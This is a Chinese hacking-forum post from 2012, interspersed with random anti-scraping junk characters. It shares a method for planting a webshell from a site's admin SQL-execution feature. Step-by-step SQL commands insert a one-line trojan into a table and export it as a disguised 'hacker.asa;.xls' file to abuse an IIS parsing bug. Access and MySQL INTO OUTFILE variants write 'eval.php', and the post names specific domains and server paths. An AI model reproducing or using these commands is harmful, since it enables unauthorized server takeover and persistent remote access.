好不容易进了后台,发现啥上传啊。备份啊多木有。! T- R6 P7 y, K
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
8 ?& `3 f/ S7 j" [8 }7 r8 p7 X文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,$ i j) _# V! V; p( b& E$ D/ m
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
( B2 \+ s Y. ~1.create table cmd (a varchar(50))( _! y; r6 K. L% S% I% I, M
2.insert into cmd (a) values (‘‘)
+ ]. J) y. [, i8 _3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
( U ]1 p/ t& t% q+ [; g+ D(把表cmd的内容导出为物理路径的一个EXCEL文件)
" n! t: R2 K. c. k3 f- l4.drop table cmd
; b5 N3 F2 W" T利用IIS的BUG成功拿到了WEBSHELL。
' V( D7 H. Y9 @- W* f7 f# \
& ]7 m3 Y! ] \/ P0 G直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话0 u6 C: \. S% W, f9 @, e3 ?' x
& @- r$ y( I9 l2 P' U* R* K* X/ b SQL语句意思解释:! e7 F. ]% V8 v- V: w# s* [
第一句
. q8 W! J! w& ]/ V/ b" W2 B& m! N% R 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
! D1 G7 w& c! c7 T' Z3 H5 r+ T) {7 s% Q% g
第二句; ~( y3 ~& x' C g0 C7 x9 }) B; S
在表cmd的a字段插入一句话木马' p% f3 C: B/ b
第三句
5 e& B. ?. B8 z 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
3 y# U- d; N2 [9 @% C; z* Q- W% y- S1 K5 |8 Q
第四句. a' D' u# f2 ]+ Q2 [1 g1 e
删除建立的cmd表
4 {8 c( ~' E% I3 M& t' z2 Z
6 H4 u! [) @6 i, L% _ 以下内容为测试:
2 x T) S L( V) b Access利用后台SQL执行命令功能导出WebShell:7 V: t$ W! S% g/ U# M
这个更简单:
7 p5 B s! u2 t2 o8 y2 m) o [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
% p* h0 o' e7 N9 M4 Y6 K 或者
4 ^! A( l* C: i4 m8 g# }1 h# q$ Y [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]2 M8 { U0 ~2 H( W: f8 l+ O) p; v
3 d0 h) w- r. w3 S3 m5 C- t% X
后台有执行SQL语句功能(vote为已知表段); ^/ m/ q `9 t2 `5 g+ o, A& c, ~
希望对大家有所帮助拿shell的又一个思路$ J C, K: u2 S% o: R- A
|
发表于 2012-9-13 17:53:58
收藏
支持
反对